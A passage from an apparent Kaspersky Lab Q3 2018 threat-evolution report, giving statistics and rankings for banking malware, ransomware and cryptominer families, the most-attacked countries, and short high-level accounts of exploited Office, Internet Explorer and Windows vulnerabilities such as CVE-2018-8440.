| Cambodia | 1.8 \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 25.8 | \n2 | Nymaim | Trojan.Win32.Nymaim | 18.4 | \n3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 | \n4 | RTM | Trojan-Banker.Win32.RTM | 9.2 | \n5 | Emotet | Backdoor.Win32.Emotet | 5.9 | \n6 | Neurevt | Trojan.Win32.Neurevt | 4.7 | \n7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 | \n8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 | \n9 | Gozi | Trojan.Win32. Gozi | 1.6 | \n10 | Trickster | Trojan.Win32.Trickster | 1.4 | \n \n_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._\n\nIn Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.\n\nOverall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground \u2013 from 27% in Q2 to 18.4% in Q3 \u2013 and fell to second.\n\n## Cryptoware programs\n\n### Q3 events\n\nIn early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.\n\nAugust saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios \u2013 via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% | \n8 | Shade | Trojan-Ransom.Win32.Shade | 1,99% | \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% | \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% | \n| | | | | \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications. _\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Afghanistan | 16.85% \n2 | Uzbekistan | 14.23% \n3 | Kazakhstan | 10.17% \n4 | Belarus | 9.73% \n5 | Vietnam | 8.96% \n6 | Indonesia | 8.80% \n7 | Mozambique | 8.50% \n8 | Ukraine | 7.60% \n9 | Tanzania | 7.51% \n10 | Azerbaijan | 7.13% \n \n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already began. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 security breach. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with